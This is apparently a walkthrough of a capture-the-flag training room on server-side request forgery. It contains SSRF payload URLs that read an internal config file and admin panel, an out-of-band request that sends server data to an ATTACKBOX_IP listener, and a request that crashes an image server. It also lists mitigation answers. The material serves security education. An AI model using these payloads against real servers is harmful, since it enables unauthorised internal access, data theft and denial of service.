SSRF
Discover the inner workings of SSRF and explore multiple exploitation techniques.
SSRF is a web application security vulnerability that allows the attacker to force the server to make unauthorised requests to any local or external source on behalf of the web server. SSRF allows an attacker to interact with internal systems, potentially leading to data leaks, service disruption, or even remote code execution.
Task 1 Introduction
Learning Objectives
Understanding the workings of SSRF
Practically testing various types of SSRF
Few important tools for exploitation
Key mitigation and defensive measures
Task 2 Anatomy of SSRF Attack
What is the average weighted impact for the SSRF vulnerability as per the OWASP Top 10?
Answer can be found in the table with a little bit of reading.
Task 3 Types of SSRF - Basic
Basic SSRF is a web attack technique where an attacker tricks a server into making requests on their behalf, often targeting internal systems or third-party services. By exploiting vulnerabilities in input validation, the attacker can gain unauthorised access to sensitive information or control over remote resources, posing a significant security risk to the targeted application and its underlying infrastructure.
Fairly straight forward. Follow the instructions given in the room and you should get the answers.
Change the link http://hrms.thm/?url=localhost/copyright
to http://hrms.thm/?url=localhost/config
as instructed. This should give you the answers to the questions.

Answer the questions below
What is the username for the HRMS login panel?
[REDACTED]
Can be found after changing to config.
What is the password for the HRMS login panel?
[REDACTED]
Can be found after changing to config.
What is the admin URL as per the config file?
[REDACTED]
Can be found after changing to config.
What is the flag value after successfully logging in to the HRMS web panel?
[REDACTED]
Cane be found after logging in with the details found.

Task 4 Types of SSRF - Basic (Continued)
Follow the given instructions.
From previous task we know there exists admin.php
. We cannot acces it directly.
We can check the source of the HTML, the dropdown takes the URL from an internal system and renders the data. The details of all employees are being rendered from http://192.168.2.10/employees.php
and http://192.168.2.10/salary.php
.
We can change this to /admin.php
.
Once the value is updated we can choose that in the drop down menu and we should get our flag.

Answer the questions below
Is accessing non-routable addresses possible if a server is vulnerable to SSRF (yea/nay)?
yea
What is the flag value after accessing the admin panel?
[REDACTED]
Can be found after following the given steps.
Task 5 Types of SSRF - Blind
Blind SSRF refers to a scenario where the attacker can send requests to a target server, but they do not receive direct responses or feedback about the outcome of their requests. In other words, the attacker is blind to the server's responses.
This type of SSRF can be more challenging to exploit because the attacker cannot directly see the results of their actions. We will discuss its various examples.
Out-of-band SSRF is a technique where the attacker leverages a separate, out-of-band communication channel instead of directly receiving responses from the target server to receive information or control the exploited server.
This approach is practical when the server's responses are not directly accessible to the attacker.
This again is a fairly straightforward. Follow all the instructions given.
How it works
Once again, log in to the dashboard and click on the
Profile
tab in the navigation bar. We will see that it redirects tohttp://hrms.thm/profile.php?url=localhost/getInfo.php
, which displays a message that data is being sent.

What is happening here? Once we load
profile.php
, it sends data to an external page namedgetInfo.php
, which is probably used for analytics or logs.Here, an attacker can redirect the request to their server, thus getting additional information about the server for exploitation or data pilferage.
Create
server.py
as instructed with the code that is given.The given code will receive all the content and save it to a file
data.html
on the server.Now open the browser and open
http://hrms.thm/profile.php?url=http://ATTACKBOX_IP:8080
, which will log the data in thedata.html
.data.html
file, which contains all the essential information related to the server that can be used to launch further attacks.
Answer the questions below
Does Out-of-band SSRF always include a technique in which an attacker always receives direct responses from the server (yea/nay)?
nay
What is the value for Virtual Directory Support on the PHP server per the logged data?
[REDACTED]
Can be found in data.html
What is the value of the PHP Extension Build on the server?
[REDACTED]
Can be found in data.html
Which type of SSRF doesn't give us a direct response or feedback?
Blind
Task 6 A Classic Example - Crashing the Server
One scenario and attacker could abuse SSRF, is by crashing the server or creating a denial of service for other hosts.
There are multiple instances (WordPress, CairoSVG) where attackers try to disrupt the availability of a system by launching SSRF attacks. We will see how a complete server crash can occur through forged requests to a vulnerable server.
Again very straightforward instructions.
How it works
Once we log in to the dashboard, we will see a tab called
Training
in the navigation bar, which is used to load the training content for the employees.Once we click on that tab, we will see that it redirects to the URL
http://hrms.thm/url.php=192.168.2.10/trainingbanner.jpg
, which shows training content.

We notice that the
url.php
file is loading external content displayed here. What if we try to load any other content?Try opening the file
http://hrms.thm/url.php?id=10.10.10.10
. Great! - it opened the file for you.

Now that we know the server is vulnerable to basic SSRF, let's explore the code of
url.php
to make it crash the server.The above code shows that the
url.php
loads an image; if the image size exceeds100KB
, it shows a memory outage message and throws an error.Let's try to crash the server by loading an image greater than 100 KB. For your convenience, we already have such an image available, which you can forge via
http://hrms.thm/url.php?id=192.168.2.10/bigImage.jpg
.

Answer the questions below
What is the flag value after loading a big image exceeding 100KB?
[REDACTED]
Can be found after crashing the image server by following the instructions.
Task 7 Remedial Measures
Answer the questions below
Which of the following is the suggested approach while handling trusted URLs? Write the correct option only.
a) Filter out disallowed URLs
b) Maintaining an allowlist of trusted URLs
b
Since SSRF mainly exploits server-side requests, is it optional to sanitise the input URLs or parameters (yea/nay)?
nay
Last updated
Was this helpful?